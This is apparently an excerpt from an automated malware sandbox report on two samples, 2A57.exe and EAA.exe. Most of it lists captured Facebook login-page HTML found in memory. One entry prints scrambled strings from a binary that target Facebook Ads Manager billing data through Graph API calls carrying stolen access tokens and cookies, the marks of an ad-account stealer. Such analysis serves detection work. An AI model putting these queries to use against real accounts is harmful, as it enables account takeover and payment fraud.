data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: </span><a href="/r.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;locale=en_US&amp;display=page" rel="nofollow" class="_97w5">Sign up for Facebook</a></div></div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" /><input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false" /><input t equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: </span><a href="/r.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;locale=en_US&amp;display=page" rel="nofollow" class="_97w5">Sign up for Facebook</a></div></div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" /><input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false" /><input type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled" value="false" /><input type="hidden" autocomplete="off" name="ab_test_data" value="" /></form><script nonce="3nHgiaRw">window.ge||(window.ge=function(a){return document.getElementById(a)});window.onload=function(a){return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=new RegExp(a+"=(.*?)(;|$)");return a.test(document.cookie)?RegExp.$1:null}b("c_user")&&!window.__cancelCookieReload&&(window.clearInterval(window.__cookieReload),window.location=a)}function begin_polling_login_cookies(a){window.__cookieReload=window.setInterval(function(){reload_on_new_cookie(a)},5e3),window.__cancelCookieReload=!1,window.addEventListener("beforeunload",function(){window.__cancelCookieReload=!0})}</script></div></div></div></div><div class=""><div class="_95ke _8opy"><div id="pageFooter" data-referrer="page_footer" data-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_US&quot;, &quot;https:\/\/de-de.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 0); return false;" title="German">Deutsch</a></li><li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 1);
                  Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: </span><a href="/r.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;locale=en_US&amp;display=page" rel="nofollow" class="_97w5">Sign up for Facebook</a></div></div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" /><input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false" /><input type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled" value="false" /><input type="hidden" autocomplete="off" name="ab_test_data" value="" /></form><script nonce="tBkKtFtO">window.ge||(window.ge=function(a){return document.getElementById(a)});window.onload=function(a){return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=new RegExp(a+"=(.*?)(;|$)");return a.test(document.cookie)?RegExp.$1:null}b("c_user")&&!window.__cancelCookieReload&&(window.clearInterval(window.__cookieReload),window.location=a)}function begin_polling_login_cookies(a){window.__cookieReload=window.setInterval(function(){reload_on_new_cookie(a)},5e3),window.__cancelCookieReload=!1,window.addEventListener("beforeunload",function(){window.__cancelCookieReload=!0})}</script></div></div></div></div><div class=""><div class="_95ke _8opy"><div id="pageFooter" data-referrer="page_footer" data-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_US&quot;, &quot;https:\/\/de-de.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 0); return false;" title="German">Deutsch</a></li><li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 1);
                  Source: EAA.exe, 0000000C.00000002.647023897.0000000002432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647141442.0000000002434000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comX equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com] equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.come= equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.566047879.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comz equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_ot1t5YjYL3s sx_2cfa7d"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT2KDX0_xm5tHV6EtlZy1FVE0SRsncVSt4wGO4MCE2w-J6mfa5CkrpsucEDN45BdGpUG6pvEEJ0XcbRs-p9DYP6KN7DqzC6p9a4h2C8Vro8p34ncbvS8ojItgeHFEqHcfX2tkK0p_WNDBF-YGO4Xwg" title="Check out Instagram" target="_blank" rel="noopener nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bulletin</a></li><li><a href="/local/lists/245019872666104/" title="Browse our Local Lists directory.">Local</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/groups/explore/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.facebook.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></li><li><a href="/pages/create/?ref_type=site_footer" title="Create a page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="
                  Source: 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_ot1t5YjYL3s sx_2cfa7d"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT3Fx88AL6YXuc7T7uUsDzkJgrNPVa0SWpimF2Ojh5NZn7SMI-C2M0DnriCHxYRxQ2xunOCmUGhC44W06kRKaPYgmDmRXQXr11GceZLamN8hWG5MX9-pBtk1QwNhuycywaFJ21XuahAHBf2Pg5QDSA" title="Check out Instagram" target="_blank" rel="noopener nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bulletin</a></li><li><a href="/local/lists/245019872666104/" title="Browse our Local Lists directory.">Local</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/groups/explore/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.facebook.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></li><li><a href="/pages/create/?ref_type=site_footer" title="Create a page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="
                  Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648461867.0000000002480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.648461867.0000000002480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing8( equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing[ equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingt equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.648586287.0000000002489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 4 /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing_used,form_data,display_name,icon_url,federation_url,skip_z equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 4]www.facebook.comHTEP equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :false});</script><script nonce="3nHgiaRw">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="3nHgiaRw"></style><script nonce="3nHgiaRw">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" / equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: </a></li><li><a class="_sv4" dir="ltr" href="https://hi-in.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;hi_IN&quot;, &quot;en_US&quot;, &quot;https:\/\/hi-in.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 8); return false;" title="Hindi"> equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: </a></li><li><a class="_sv4" dir="ltr" href="https://zh-cn.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;zh_CN&quot;, &quot;en_US&quot;, &quot;https:\/\/zh-cn.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Simplified Chinese (China)"> equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: <Unknown exceptionbad array new lengthstring too longmap/set too longoottpokmummoomymtetgnotsafecodea93i2ggcocodecamtheeeedvgggkuah34g34lnstalisiiduhqarg22223wdn_prc_useMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36bfceice-based/login/in/dev/log"="t""jazoeslsd"id""u=urce""sot=oesjaz&lsdd=&uice=ur&soxt=&ne-based/login/blogin/device_usersonokieJcoonieJscookunt_billingccount_settings/accofcebads/manager/a_token:cessactID:un{accogettIdounaccers=false&method=get&pretty=0&suppress_http_code=1_unpaid_unrepaid_invoice%22%2C%22has_repay_processing_invoices%22%5D&include_headed_market%22%2C%22current=%5B%22active_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22can_pay_now%22%2C%22can_repay_now%22%2C%22current_unbilled_spend%22%2C%22extended_credit_info%22%2C%22is_br_entity_account%22%2C%22has_extended_credit%22%2C%22max_billing_threshold%22%2C%22min_billing_threshold%22%2C%22min_payment%22%2C%22next_bill_date%22%2C%22pending_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22promotion_progress_bar_info%22%2C%22show_improved_boleto%22%2C%22business%7Bid%2Cname%2Cpayment_account_id%7D%22%2C%22total_prepay_balance%22%2C%22is_in_3ds_authorization_enablymentsAccountDataDispatcher&fields3.0/act_fb_uid?access_token=fb_access_token&_reqName=adaccount&_reqSrc=AdsCMPahttps://graph.facebook.com/v1b_uidfenccess_tokfb_ayInfopaoway_ncan_pnfopayIit=100&method=get&pretty=0&sort=name_ascending&suppress_http_code=1le_business%7Bid%2Cname%7D%22%2C%22name%22%5D&filtering=%5B%5D&include_headers=false&limatus%22%2C%22is_direct_deals_enabled%22%2C%22business%7Bid%2Cname%7D%22%2C%22viewabess_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataManager&fields=%5B%22account_id%22%2C%22account_sthttps://graph.facebook.com/v13.0/me/adaccounts?accs_tokencesfb_aciiiqqgataddatdataaccount_idssbusinet_settings&tab=account_billing_settingscount_id&pid=p1&business_id=fb_business_id&page=accounanager/account_settings/account_billing/?act=fb_achttps://business.facebook.com/ads/mnt_idfb_accousiness_idfb_buaccess_token:countIday_processing_invoices%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1unpaid_unrepaid_invoice%22%2C%22has_repotal_prepay_balance%22%2C%22is_in_3ds_authorization_enabled_market%22%2C%22current_ling_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22can_pay_now%22%2C%22can_repay_now%22%2C%22current_unbilled_spend%22%2C%22extended_credit_info%22%2C%22is_br_entity_account%22%2C%22has_extended_credit%22%2C%22max_billing_threshold%22%2C%22min_billing_threshold%22%2C%22min_payment%22%2C%22next_bill_date%22%2C%22pending_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22promotion_progress_bar_info%22%2C%22show_improved_boleto%22%2C%22business%7Bid%2Cname%2Cpayment_account_id%
                  Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="3nHgiaRw">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_Sdvq_k","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMCPU","isCQuick":false});</script><script nonce="3nHgiaRw">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="3nHgiaRw"></style><script nonce="3nHgiaRw">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2FacceU equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="3nHgiaRw">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_Sdvq_k","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMCPU","isCQuick":false});</script><script nonce="3nHgiaRw">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="3nHgiaRw"></style><script nonce="3nHgiaRw">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="short equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="3nHgiaRw">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_Sdvq_k","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMCPU","isCQuick":false});</script><script nonce="3nHgiaRw">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="3nHgiaRw"></style><script nonce="3nHgiaRw">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yh/l/0,cross/Psnx7bG9mEY.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="JJDQYLd" crossorigin="anonymous" /> equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="M5pAlxU0">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_SdvGZk","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMJMk","isCQuick":false});</script><script nonce="M5pAlxU0">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="M5pAlxU0"></style><script nonce="M5pAlxU0">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/dat equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647322110.0000000002439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tBkKtFtO">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_SdvtAs","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMqV8","isCQuick":false});</script><script nonce="tBkKtFtO">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tBkKtFtO"></style><script nonce="tBkKtFtO">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2FaccC equals www.facebook.com (Facebook)
